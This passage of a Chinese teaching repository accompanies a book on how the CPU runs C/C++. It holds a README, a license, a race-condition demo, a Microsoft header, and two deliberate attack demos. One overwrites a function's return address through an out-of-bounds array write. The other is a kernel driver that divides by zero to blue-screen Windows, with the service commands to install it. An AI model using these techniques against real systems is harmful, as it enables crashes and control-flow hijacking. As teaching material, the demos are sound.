├── .gitignore ├── LICENSE ├── README.md ├── doc ├── VXGZH.jpg ├── array.jpg ├── atomic.png ├── bsod.png ├── buy.png ├── cache.png ├── canary.png ├── cover-a.jpg ├── cover-b.jpg ├── mfence.png ├── overflow.PNG ├── overflow.png ├── prediction.png ├── setjmp-longjmp.png ├── shellcode.png ├── spectre.png ├── syscall.jpg └── wallpaper.png └── source ├── arrayOverflow.c ├── atomic.c ├── bsod ├── bsod.c ├── bsod.sys ├── mce.h ├── ntoskrnl.lib └── wdm.h ├── cache.c ├── canary.c ├── meltdown ├── linuxDriver │ ├── Makefile │ └── kernelDriver.c ├── meltdown.c └── winDriver │ ├── kernelDriver.c │ ├── kernelDriver.sys │ ├── mce.h │ ├── ntoskrnl.lib │ └── wdm.h ├── mfence-win.cpp ├── mfence.cpp ├── prediction.c ├── setjmp-longjmp.c ├── shellcode ├── injectShellcode.c ├── shellcode-non-zero.s ├── shellcode.bin ├── shellcode.c ├── shellcode.s └── shellcodeSled.bin ├── spectre ├── spectre-ii.c ├── spectre-iii.c └── spectre.c ├── syscall.s └── virtualMemory.c /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | 28 | # Executables 29 | *.exe 30 | *.out 31 | *.app 32 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 歡迎蒞臨:阿布編程 2 |

關注:沒有用的知識

3 |

4 | Why GuiLite 5 |

6 |

7 | 8 | 9 | 10 | 11 |

12 | 13 | ## 快速上手 14 | - 👀 在 B 站觀看[《CPU眼裏的:編程知識》](https://space.bilibili.com/261582436)視頻系列 15 | - 🧪 找到感興趣的話題,上手實驗 16 | 17 | ## 代碼目錄 18 | 19 | 20 | 24 | 25 | 29 | 30 | 34 | 35 | 39 |

系統調用
21 |

内存屏障
22 |

setjmp/longjmp
23 |

缓存
26 |

数组越界
27 |

蓝屏
28 |

Atomic
31 |

Spectre
32 |

分支預測
33 |

数组越界
36 |

堆栈里的金丝雀
37 |

Shellcode
38 |
40 | 41 | ## 📚實體 + 電子書籍 42 | 如果喜歡阿布的講述方式,希望更加系統的學習這些知識,也可以看看阿布的新書《CPU眼裏的C/C++》 43 | 44 | 45 | 48 |
46 | 47 |
49 | 50 | 购买链接:https://item.jd.com/14135576.html 51 | 52 | 掃描二維碼,5折購買或0元試讀電子版 53 | ![QR code](/doc/buy.png) 54 | 55 | ## 📞社區交流 56 | - 視頻的圖、文版本,可以在:《阿布編程》的公衆號中閲讀 57 | - 遇到問題,可以在《阿布編程》的公衆號中討論 58 | - 微信公衆號: 59 | 60 | 61 | 63 |

公众号🔑:阿布编程 62 |
64 | -------------------------------------------------------------------------------- /doc/VXGZH.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/VXGZH.jpg -------------------------------------------------------------------------------- /doc/array.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/array.jpg -------------------------------------------------------------------------------- /doc/atomic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/atomic.png -------------------------------------------------------------------------------- /doc/bsod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/bsod.png -------------------------------------------------------------------------------- /doc/buy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/buy.png -------------------------------------------------------------------------------- /doc/cache.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cache.png -------------------------------------------------------------------------------- /doc/canary.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/canary.png -------------------------------------------------------------------------------- /doc/cover-a.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cover-a.jpg -------------------------------------------------------------------------------- /doc/cover-b.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cover-b.jpg -------------------------------------------------------------------------------- /doc/mfence.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/mfence.png -------------------------------------------------------------------------------- /doc/overflow.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/overflow.PNG -------------------------------------------------------------------------------- /doc/overflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/overflow.png -------------------------------------------------------------------------------- /doc/prediction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/prediction.png -------------------------------------------------------------------------------- /doc/setjmp-longjmp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/setjmp-longjmp.png -------------------------------------------------------------------------------- /doc/shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/shellcode.png -------------------------------------------------------------------------------- /doc/spectre.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/spectre.png -------------------------------------------------------------------------------- /doc/syscall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/syscall.jpg -------------------------------------------------------------------------------- /doc/wallpaper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/wallpaper.png -------------------------------------------------------------------------------- /source/arrayOverflow.c: -------------------------------------------------------------------------------- 1 | //gcc arrayOverflow.c -fno-stack-protector 2 | 3 | #include 4 | #include 5 | 6 | void malfunc() 7 | { 8 | printf("💀💀💀💀\n"); 9 | exit(4); 10 | } 11 | 12 | void func_1() 13 | { 14 | long a[2]; 15 | a[3] = (long)malfunc; 16 | a[1] = 1; 17 | a[0] = 2; 18 | a[-1] = 3; 19 | a[-2] = 4; 20 | } 21 | 22 | int main() 23 | { 24 | func_1(); 25 | printf("岁月静好✅"); 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /source/atomic.c: -------------------------------------------------------------------------------- 1 | //gcc atomic.c -lpthread 2 | 3 | #include 4 | #include 5 | 6 | int a; 7 | //_Atomic int a; //uncomment this code to fix race condition 8 | 9 | void* sum() 10 | { 11 | for(int i = 0; i < 10000000; i++) 12 | { 13 | a++; 14 | } 15 | } 16 | 17 | void test() 18 | { 19 | a = 0; 20 | pthread_t t1, t2; 21 | pthread_create(&t1, NULL, sum, NULL); 22 | pthread_create(&t2, NULL, sum, NULL); 23 | 24 | pthread_join(t1, NULL); 25 | pthread_join(t2, NULL); 26 | printf("a = %d\n", a); 27 | } 28 | 29 | int main() 30 | { 31 | test(); 32 | test(); 33 | test(); 34 | } -------------------------------------------------------------------------------- /source/bsod/bsod.c: -------------------------------------------------------------------------------- 1 | //cl.exe bsod.c ntoskrnl.lib /I .\ /link /out:bsod.sys /subsystem:native /driver:wdm -entry:DriverEntry 2 | //sc create bsodDriver binpath=%cd%\bsod.sys type=kernel 3 | //sc start bsodDriver 4 | //sc stop abuDriver 5 | //sc delete abuDriver 6 | 7 | int func(int input) 8 | { 9 | return 1/input; 10 | } 11 | 12 | #define _AMD64_ 13 | #include "wdm.h" 14 | 15 | NTSTATUS DriverEntry(void* a, void* b) 16 | { 17 | func(0); 18 | } 19 | 20 | /* 21 | //cl.exe bsod.c user32.lib /link /entry:main 22 | #include 23 | int main() 24 | { 25 | func(0); 26 | MessageBoxA(NULL, "Abu Coding", NULL, MB_OK); 27 | } 28 | */ -------------------------------------------------------------------------------- /source/bsod/bsod.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/bsod/bsod.sys -------------------------------------------------------------------------------- /source/bsod/mce.h: -------------------------------------------------------------------------------- 1 | /*++ BUILD Version: 0011 // Increment this if a change has global effects 2 | 3 | Copyright (c) 1991-2001 Microsoft Corporation 4 | 5 | Module Name: 6 | 7 | mce.h 8 | 9 | Abstract: 10 | 11 | This header file defines the Machine Check Errors definitions. 12 | 13 | Author: 14 | 15 | Revision History: 16 | 17 | Creation: 04-Apr-2001 18 | 19 | --*/ 20 | 21 | #ifndef _MCE_ 22 | #define _MCE_ 23 | 24 | #pragma once 25 | 26 | #if _MSC_VER >= 1200 27 | #pragma warning(push) 28 | #pragma warning(disable:4201) // nonstandard extension used : nameless struct/union 29 | #pragma warning(disable:4214) // nonstandard extension used : bit field types other then int 30 | #endif 31 | 32 | // 33 | // HalMcaLogInformation 34 | // 35 | 36 | typedef enum { 37 | HAL_MCE_RECORD, 38 | HAL_MCA_RECORD 39 | } MCA_EXCEPTION_TYPE; 40 | 41 | #if defined(_X86_) || defined(_IA64_) || defined(_AMD64_) 42 | 43 | // 44 | // ADDR register for each MCA bank 45 | // 46 | 47 | typedef union _MCI_ADDR{ 48 | struct { 49 | ULONG Address; 50 | ULONG Reserved; 51 | } DUMMYSTRUCTNAME; 52 | 53 | ULONGLONG QuadPart; 54 | } MCI_ADDR, *PMCI_ADDR; 55 | 56 | 57 | #if defined(_AMD64_) 58 | 59 | // 60 | // STATUS register for each MCA bank. 61 | // 62 | 63 | #if (NTDDI_VERSION <= NTDDI_WINXP) 64 | typedef union _MCI_STATS { 65 | struct { 66 | USHORT McaCod; 67 | USHORT ModelErrorCode; 68 | ULONG OtherInfo : 25; 69 | ULONG Damage : 1; 70 | ULONG AddressValid : 1; 71 | ULONG MiscValid : 1; 72 | ULONG Enabled : 1; 73 | ULONG Uncorrected : 1; 74 | ULONG OverFlow : 1; 75 | ULONG Valid : 1; 76 | } MciStatus; 77 | 78 | ULONG64 QuadPart; 79 | } MCI_STATS, *PMCI_STATS; 80 | #else 81 | typedef union _MCI_STATS { 82 | struct { 83 | USHORT McaErrorCode; 84 | USHORT ModelErrorCode; 85 | ULONG OtherInformation : 25; 86 | ULONG ContextCorrupt : 1; 87 | ULONG AddressValid : 1; 88 | ULONG MiscValid : 1; 89 | ULONG ErrorEnabled : 1; 90 | ULONG UncorrectedError : 1; 91 | ULONG StatusOverFlow : 1; 92 | ULONG Valid : 1; 93 | } MciStatus; 94 | 95 | ULONG64 QuadPart; 96 | } MCI_STATS, *PMCI_STATS; 97 | #endif 98 | 99 | #endif // _AMD64_ 100 | 101 | #if defined(_X86_) 102 | 103 | // 104 | // STATUS register for each MCA bank. 105 | // 106 | 107 | typedef union _MCI_STATS { 108 | struct { 109 | USHORT McaCod; 110 | USHORT MsCod; 111 | ULONG OtherInfo : 25; 112 | ULONG Damage : 1; 113 | ULONG AddressValid : 1; 114 | ULONG MiscValid : 1; 115 | ULONG Enabled : 1; 116 | ULONG UnCorrected : 1; 117 | ULONG OverFlow : 1; 118 | ULONG Valid : 1; 119 | } MciStats; 120 | 121 | ULONGLONG QuadPart; 122 | 123 | } MCI_STATS, *PMCI_STATS; 124 | 125 | #endif // _X86_ 126 | 127 | // 128 | // MCA exception log entry 129 | // Defined as a union to contain MCA specific log or Pentium style MCE info. 130 | // 131 | 132 | #define MCA_EXTREG_V2MAX 24 // X86: Max. Number of extended registers 133 | 134 | #if defined(_X86_) || defined(_AMD64_) 135 | 136 | #if (NTDDI_VERSION >= NTDDI_WINXP) 137 | typedef struct _MCA_EXCEPTION { 138 | 139 | // Begin Version 1 stuff 140 | ULONG VersionNumber; // Version number of this record type 141 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE 142 | LARGE_INTEGER TimeStamp; // exception recording timestamp 143 | ULONG ProcessorNumber; 144 | ULONG Reserved1; 145 | 146 | union { 147 | struct { 148 | UCHAR BankNumber; 149 | UCHAR Reserved2[7]; 150 | MCI_STATS Status; 151 | MCI_ADDR Address; 152 | ULONGLONG Misc; 153 | } Mca; 154 | 155 | struct { 156 | ULONGLONG Address; // physical addr of cycle causing the error 157 | ULONGLONG Type; // cycle specification causing the error 158 | } Mce; 159 | } u; 160 | // End Version 1 stuff 161 | 162 | // Begin Version 2 stuff 163 | ULONG ExtCnt; 164 | ULONG Reserved3; 165 | ULONGLONG ExtReg[MCA_EXTREG_V2MAX]; 166 | // End Version 2 stuff 167 | 168 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 169 | #else 170 | typedef struct _MCA_EXCEPTION { 171 | 172 | ULONG VersionNumber; // Version number of this record type 173 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE 174 | LARGE_INTEGER TimeStamp; // exception recording timestamp 175 | ULONG ProcessorNumber; 176 | ULONG Reserved1; 177 | 178 | union { 179 | struct { 180 | UCHAR BankNumber; 181 | UCHAR Reserved2[7]; 182 | MCI_STATS Status; 183 | MCI_ADDR Address; 184 | ULONGLONG Misc; 185 | } Mca; 186 | 187 | struct { 188 | ULONGLONG Address; // physical addr of cycle causing the error 189 | ULONGLONG Type; // cycle specification causing the error 190 | } Mce; 191 | } u; 192 | 193 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 194 | #endif 195 | 196 | typedef MCA_EXCEPTION CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check 197 | typedef MCA_EXCEPTION CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error 198 | 199 | #if (NTDDI_VERSION >= NTDDI_WINXP) 200 | #define MCA_EXCEPTION_V1_SIZE FIELD_OFFSET(MCA_EXCEPTION, ExtCnt) 201 | #define MCA_EXCEPTION_V2_SIZE sizeof(struct _MCA_EXCEPTION) 202 | #endif 203 | 204 | #endif // _X86_ || _AMD64_ 205 | 206 | // 207 | // ERRORS: ERROR_SEVERITY definitions 208 | // 209 | // One day the MS compiler will support typed enums with type != int so this 210 | // type of enums (UCHAR, __int64) could be defined... 211 | // 212 | 213 | #if defined(_AMD64_) || defined(_IA64_) 214 | 215 | typedef UCHAR ERROR_SEVERITY, *PERROR_SEVERITY; 216 | 217 | typedef enum _ERROR_SEVERITY_VALUE { 218 | ErrorRecoverable = 0, 219 | ErrorFatal = 1, 220 | ErrorCorrected = 2, 221 | ErrorOthers = 3, // [3,...] values are reserved 222 | } ERROR_SEVERITY_VALUE; 223 | 224 | #endif 225 | 226 | #if defined(_IA64_) 227 | 228 | #if 0 229 | // FIXFIX: This should not be required for IA64. 230 | // 231 | // STATUS register for each MCA bank. 232 | // 233 | 234 | typedef union _MCI_STATS { 235 | struct { 236 | USHORT McaCod; 237 | USHORT MsCod; 238 | ULONG OtherInfo : 25; 239 | ULONG Damage : 1; 240 | ULONG AddressValid : 1; 241 | ULONG MiscValid : 1; 242 | ULONG Enabled : 1; 243 | ULONG UnCorrected : 1; 244 | ULONG OverFlow : 1; 245 | ULONG Valid : 1; 246 | } MciStats; 247 | 248 | ULONGLONG QuadPart; 249 | 250 | } MCI_STATS, *PMCI_STATS; 251 | 252 | #endif // 0 253 | 254 | // 255 | // IA64 ERRORS: ERROR_REVISION definitions 256 | // 257 | 258 | typedef union _ERROR_REVISION { 259 | USHORT Revision; // Major and Minor revision number of the record: 260 | struct { 261 | UCHAR Minor; // Byte0: Minor. 262 | UCHAR Major; // Byte1: Major. 263 | } DUMMYSTRUCTNAME; 264 | } ERROR_REVISION, *PERROR_REVISION; 265 | 266 | // For Info: 267 | #if (NTDDI_VERSION > NTDDI_WINXP) 268 | #define ERROR_MAJOR_REVISION_SAL_03_00 0 269 | #define ERROR_MINOR_REVISION_SAL_03_00 2 270 | #define ERROR_REVISION_SAL_03_00 { ERROR_MINOR_REVISION_SAL_03_00, \ 271 | ERROR_MAJOR_REVISION_SAL_03_00 } 272 | 273 | // 274 | // Section Header revision is fixed at Major == 2 and Minor == 0 275 | // 276 | #define ERROR_FIXED_SECTION_REVISION { 2,\ 277 | 0 } 278 | #else 279 | #define ERROR_REVISION_SAL_03_00 { 2, 0 } 280 | #endif 281 | 282 | // 283 | // IA64 ERRORS: ERROR_TIMESTAMP definitions 284 | // 285 | 286 | typedef union _ERROR_TIMESTAMP { 287 | ULONGLONG TimeStamp; 288 | struct { 289 | UCHAR Seconds; // Byte0: Seconds 290 | UCHAR Minutes; // Byte1: Minutes 291 | UCHAR Hours; // Byte2: Hours 292 | UCHAR Reserved; // Byte3: Reserved 293 | UCHAR Day; // Byte4: Day 294 | UCHAR Month; // Byte5: Month 295 | UCHAR Year; // Byte6: Year 296 | UCHAR Century; // Byte7: Century 297 | } DUMMYSTRUCTNAME; 298 | } ERROR_TIMESTAMP, *PERROR_TIMESTAMP; 299 | 300 | // 301 | // IA64 ERRORS: ERROR_GUID definitions 302 | // 303 | 304 | typedef struct _ERROR_GUID { 305 | ULONG Data1; 306 | USHORT Data2; 307 | USHORT Data3; 308 | UCHAR Data4[8]; 309 | } ERROR_GUID, *PERROR_GUID; 310 | 311 | // 312 | // IA64 ERRORS: ERROR GUIDs definitions 313 | // 314 | 315 | typedef ERROR_GUID _ERROR_DEVICE_GUID; 316 | typedef _ERROR_DEVICE_GUID ERROR_DEVICE_GUID, *PERROR_DEVICE_GUID; 317 | 318 | typedef ERROR_GUID _ERROR_PLATFORM_GUID; 319 | typedef _ERROR_PLATFORM_GUID ERROR_PLATFORM_GUID, *PERROR_PLATFORM_GUID; 320 | 321 | // 322 | // IA64 ERRORS: ERROR_RECORD_HEADER definitions 323 | // 324 | 325 | typedef union _ERROR_RECORD_VALID { 326 | UCHAR Valid; 327 | struct { // Bits 328 | UCHAR OemPlatformID:1; // 0: OEM Platform Id is present in the record header 329 | UCHAR Reserved:7; // 1-7: Reserved 330 | } DUMMYSTRUCTNAME; 331 | } ERROR_RECORD_VALID, *PERROR_RECORD_VALID; 332 | 333 | typedef struct _ERROR_RECORD_HEADER { // Offsets: 334 | ULONGLONG Id; // 0: Unique identifier 335 | ERROR_REVISION Revision; // 8: Major and Minor revision number of the record 336 | ERROR_SEVERITY ErrorSeverity; // 10: Error Severity 337 | ERROR_RECORD_VALID Valid; // 11: Validation bits 338 | ULONG Length; // 12: Length of this record in bytes, including the header 339 | ERROR_TIMESTAMP TimeStamp; // 16: Timestamp recorded when event occurred 340 | UCHAR OemPlatformId[16]; // 24: Unique platform identifier. OEM defined. 341 | } ERROR_RECORD_HEADER, *PERROR_RECORD_HEADER; 342 | 343 | // 344 | // IA64 ERRORS: ERROR_SECTION_HEADER definitions 345 | // 346 | 347 | typedef union _ERROR_RECOVERY_INFO { 348 | UCHAR RecoveryInfo; 349 | struct { // Bits: 350 | UCHAR Corrected:1; // 0: Corrected 351 | UCHAR NotContained:1; // 1: Containment Warning 352 | UCHAR Reset:1; // 2: Reset 353 | UCHAR Reserved:4; // 6-3: Reserved 354 | UCHAR Valid:1; // 7: Valid Recovery Information 355 | } DUMMYSTRUCTNAME; 356 | } ERROR_RECOVERY_INFO, *PERROR_RECOVERY_INFO; 357 | 358 | typedef struct _ERROR_SECTION_HEADER { 359 | ERROR_DEVICE_GUID Guid; // Unique identifier 360 | ERROR_REVISION Revision; // Major and Minor revision number of the section 361 | ERROR_RECOVERY_INFO RecoveryInfo; // Recovery Information 362 | UCHAR Reserved; 363 | ULONG Length; // Length of this error device section in bytes, 364 | // including the header. 365 | } ERROR_SECTION_HEADER, *PERROR_SECTION_HEADER; 366 | 367 | // 368 | // IA64 Machine Check Error Logs: 369 | // WMI requires processor LID being stored in the Log. 370 | // This LID corresponds to the processor on which the SAL_PROC was executed on. 371 | // 372 | // TEMPTEMP: Implementation is temporary, until we implement HAL SW Error Section. 373 | // Note that the current FW builds do not update the _ERROR_PROCESSOR.CRLid field, 374 | // assuming there is a _ERROR_PROCESSOR section in the record. 375 | // 376 | 377 | #if !defined(__midl) && defined(_MSC_EXTENSIONS) 378 | __inline 379 | USHORT 380 | GetFwMceLogProcessorNumber( 381 | PERROR_RECORD_HEADER Log 382 | ) 383 | { 384 | PERROR_SECTION_HEADER section = (PERROR_SECTION_HEADER)((ULONG64)Log + sizeof(*Log)); 385 | USHORT lid = (USHORT)((UCHAR)(section->Reserved)); 386 | lid |= (USHORT)((UCHAR)(Log->TimeStamp.Reserved) << 8); 387 | return( lid ); 388 | } // GetFwMceLogProcessorNumber() 389 | #endif // !__midl 390 | 391 | // 392 | // IA64 ERRORS: ERROR_PROCESSOR device definitions 393 | // 394 | // The MCA architecture supports five different types of error reporting functional units 395 | // with the associated error records and its error severity. 396 | // At any point in time, a processor could encounter an MCA/CMC event due to errors detected 397 | // in one or more of the following units: 398 | // - Cache Check 399 | // - TLB Check 400 | // - Bus Check 401 | // - Register File 402 | // - Micro 